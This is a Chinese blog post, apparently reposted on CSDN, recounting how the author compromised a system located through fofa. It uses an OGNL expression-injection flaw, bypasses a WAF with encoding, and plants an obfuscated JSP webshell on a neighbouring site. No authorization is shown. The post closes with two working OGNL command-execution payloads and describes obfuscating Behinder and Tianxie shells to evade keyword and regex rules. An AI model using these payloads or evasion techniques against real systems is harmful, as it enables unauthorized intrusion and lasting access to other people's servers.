拿webshell_某系统绕过waf拿下webshell

本文分享了一次绕过WAF拿下Webshell的过程,通过分析和尝试不同的编码及混淆方法,最终成功在目标系统中写入并执行Webshell,强调了免杀和对WAF规则理解的重要性。
摘要由CSDN通过智能技术生成

ee45bbde567b78392072c910ed467947.gif

文章来源:安全先师

前言

对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。

正文

小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器

7dc31a75401f64d714c00d4eeaf39f6a.png

在fofa上找到一个站的可以算算术

27afe5b3c388b5c8641cc10a70e22316.png

接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结果查了一波ip不是。另外我的ip没有被ban。那就是另外的waf。那还好post怼一下

65f70949d046d29430eb739cbd98e0a2.png

get怼一下

0f681c83c9360e22c56cf8023f09465a.png

我猜测可能是对关键字进行拦截

79c21d6f8e8f8e2562e19d7396f1a04f.png

结果证实了我的猜想那么我们怎么办呢。当然是绕过他

0ac8d1f7ce91708ada643d1d2e85d794.png

我想不用我说怎么绕过的只要看截图就知道是如何绕过的我这里就不说了a9025322bde0d8ed1a34d111669f195c.png 
当然搞到这里有人就说了这权限这么大很高直接cs上线。或者下载exe到服务器上然后执行exe上线。稍微免杀一波就ok了
但是无奈我的vps没有续费。另外搞web的不弹个shell总觉的有点尴尬。于是开始想办法getshell.。那么我们先用命令看
这个在哪个目录。我们执行dir命令查询。握擦执行whoami可以执行这个不可以。

edf8b581fea9b85594b30f706027829b.png

那么我们加上命令行参数看看成功执行8896daf6a444082f08ca6b62d8be802c.png 
我们来echo写webshell。发现这里有白名单解析限制。只要不是图片,等文件一律不解析

fcfc7a0e27f7b553f21ce9679241ec26.png

看了不能再这个OA上强搞。我们只能在看看这个ip有没有别的站点。终于找到一个站点

654da681397086aaa9a54526f0bfb2ba.png

那么就拿它开刀就行。经过一系列的寻找我终于找到这个站点对应的web根目录。我们来写shell当然是最简短的shell最好了

868fda63c09bc78da3ea7f37980dfae0.png

我们写入成功了没有回显,我们访问我们的shell。空白接下来我们用。进行写shell我们的文件名命名成x.jsp

285f2187f33c5c2a5e9b6f707fb6e6e3.png

我们post提交一下。握擦。流量监控我们被拦截了。我们用流行的编码(base64)方式加密测试一下看看拦截么。当然我们的接收的jsp的马子没有改代码。3a2e3d29bf3fd36d94e9d2695f103039.png  
我们开始测试发现没有被拦击只是报错了包500。那么这下好办了我们需要修改一下我们的接收内容的jsp的马子。经过在本地测试
我们修改的马子。大概就是下图至于是什么我就不详细截图了。我想大家能猜到

16db2e43f7d873315bde384806a1ccb2.png

接下来我们把要上传的jsp马子base64编码提交一波看看效果。提交成功了我们访问一波我们的*********!!!!pppsx.jsp。握擦直接403

ec3d619db76df790ccfad159e44e17a8.png

于是我又换了冰蝎 等能想到的马子都换了就是搞不定日狗了。后来我fuzz了一下知道这个waf是匹配关键字加正则。那么知道这个我们来修改一下冰蝎的马子用某code编码来绕过关键字检测。并且我们来绕过他的正则检测。我们来修改编写马子

0d0297f4f61f21722ef7943ec6ad9611.png

上传上去了这次显示空白说明绕过了。我们用冰蝎连接看看显示不可连接沃日本地测试的好好的怎么连接不了。我思考可能是jdk或者是他不支持AES加密于是又写了一个jsp来获取了一下服务器的这些信息

aeec29650f57cc8e4d614082a32adf5a.png

我擦一看目标jdk版本1.6我想冰蝎马子估计是有问题得改改。我在想去github上看看有没有别的shell连接工具。于是找到了。shack2 的天蝎webshell管理工具。找到一个

5d782cef32aecd55cbb259235fe88826.png

直接上去肯定是不行。直接也是403.也得进行混淆免杀。于是在本地搞了一波混淆免杀。上上去了。访问一下空白连接一下看看

b70b371d623ee0766c5cd636b74409cd.png

16205bc955216342a68bc1e73bf68d3d.png

44633033d0974615d0efbb50f280b54f.png

至此拿下webshell。没啥技术含量。从这认识到自己的不足。得研究一波jsp免杀了

exp内容如下: 

exp1 get:message=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream())exp2 post:message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

一如既往的学习,一如既往的整理,一如即往的分享。感谢支持97c23bf52d4a2080eebd47b0c77b0adc.png

9cfe821b1a6d84fc6f5bd23f05013467.png

推荐文章++++

c506137a281f76eef8ff38d14c7c9169.png

*常见web中间件拿shell

*实战技巧 | WAF绕过入狱指南

*从Fastjson绕WAF到打穿网闸

5fb03f6f21e97ed71ac01a910a69aee2.png

4c06a30a7a3ef4ba5aed20f9566ac309.gif

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值